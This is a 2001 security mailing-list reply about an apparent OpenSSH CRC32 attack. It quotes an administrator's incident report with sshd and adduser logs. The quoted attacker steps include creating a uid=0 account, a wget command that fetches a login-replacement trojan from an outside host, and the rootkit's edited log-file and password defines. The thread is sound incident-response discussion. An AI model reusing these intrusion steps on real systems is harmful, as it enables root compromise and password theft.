Re: Attacks against SSH?

["Armando B. Ortiz" <aortiz () onlinetraffic com>]

Per se, I have not seen anyone attacking my systems in general via SSH,
but I only allow limited access to my servers via any type of remote
login facility.

Firewalling your SSH and only allowing connections into it that you want
might help to curb some of the attacks people are seeing.  It's not very
difficult to do...just takes a little time.



On Sun, 2001-12-02 at 23:30, johan.augustsson () adm gu se wrote:
> I stumbeled over this post at openssh-unix-dev mailinglist last week -
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
> The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for
> RedHat 7.0) up and running when he received what looks to be a
> CRC32-attack. A few minutes later you can see (he posted parts of the
> logfile) a new user being created with uid=0 and then how an connection
> is made from system in Israel.
>
> There has been no confirmation about what he writes but I recieved the
> following mail as an answer of my questions.
>
> ------ Message ------
> I posted an openssh security alert earlier today and already got some
> responses.
> Thanks for everything.
>
> Instead of replying to everyone individually I composed the details of
> the
> attack.
>
> +++
>
> It does not look like a job of worms.
> Snort did not detect mass port scan from attacker's ip address. It seems
> that he (I assumed, so I don't have to type he/she all the way) just
> wants
> to gain access through openssh.
>
> The server is running Red Hat 7.0. With all packages up to date. The
> following daemons are running:  wu-ftpd, apache, telnet, openssh, named
> I never access the system via telnet, it is there just for backup
> purpose.
>
> > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation
> attack:
> > > network attack detected
> > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on
> > > input.
> > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on
> > > input.
> > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on
> > > input.
> > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
> > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,
> gid=528,
> > > home=/home/mattanl, shell=/bin/bash
> > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,
> gid=529,
> > > home=/home/mattan, shell=/bin/bash
>
> After the attacker gained root access. He created two users mattan and
> mattanl.
> He then downloaded a package: wget
> http://home.dal.net/resolve/login.tgz.
> The target site has been compromised. (hacked by a hacker group in
> Israel)
> This is a login replacement package, it logs the user id and passwords.
> He
> modified rk.h to:
> #define MY_LOGFILE "/dev/ttypz"
> #define MY_PASSWORD "1245890"
> After he complied and installed the login replacement. Something went
> wrong.
> /bin/login was zero bytes in length. So when he came back using telnet,
> he
> was denied of access. I also disabled sshd and kept one session open for
> remote control after found login was replaced. I md5 checked the system
> against a good backup, nothing else was altered.
>
> I will try to sniff all packets come to my this server on ssh port. If
> he
> attempts to crack the server again, I will have more details. But I
> guess I
> will have to turn the server back on.
>
> Thanks for all you time
> ------ End of message ------
>
> I had some further questions so I mailed the guy once again but has not
> recieved any answer.
>
> So, to he main question.
> Has anyone else had a system compromised by the CRC32-attack when
> running a version of sshd that is believed to be secure? OpenSSH-2.3.0
> or later, SSH 1.2.32 or later.
>
>
>
> /Johan Augustsson
>
> --------------------------------------------------------------------
> Johan Augustsson                 Phone: +46 (0)31 773 1000
> Incident Response Team           Fax: +46 (0)31 773 1087
> Göteborg University              E-mail: Johan.Augustsson () adm gu se
> Sweden
> --------------------------------------------------------------------
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
-- 
-----------------------------------------------------------------
 From the Linux Box of Armando Ortiz
                       System Administrator
                       OnLineTraffic.com
 Email:  aortiz () onlinetraffic com
 Download my public key from:
  ftp://209.185.214.98/pub/pubkeys/aortiz () onlinetraffic com pub
   or retrieve it from
  http://www.keyserver.net as aortiz () onlinetraffic com
                             (Public Key expires 01/04/2002)
       All emails from me are signed by this public key.
-----------------------------------------------------------------

Attachment: _bin
Description: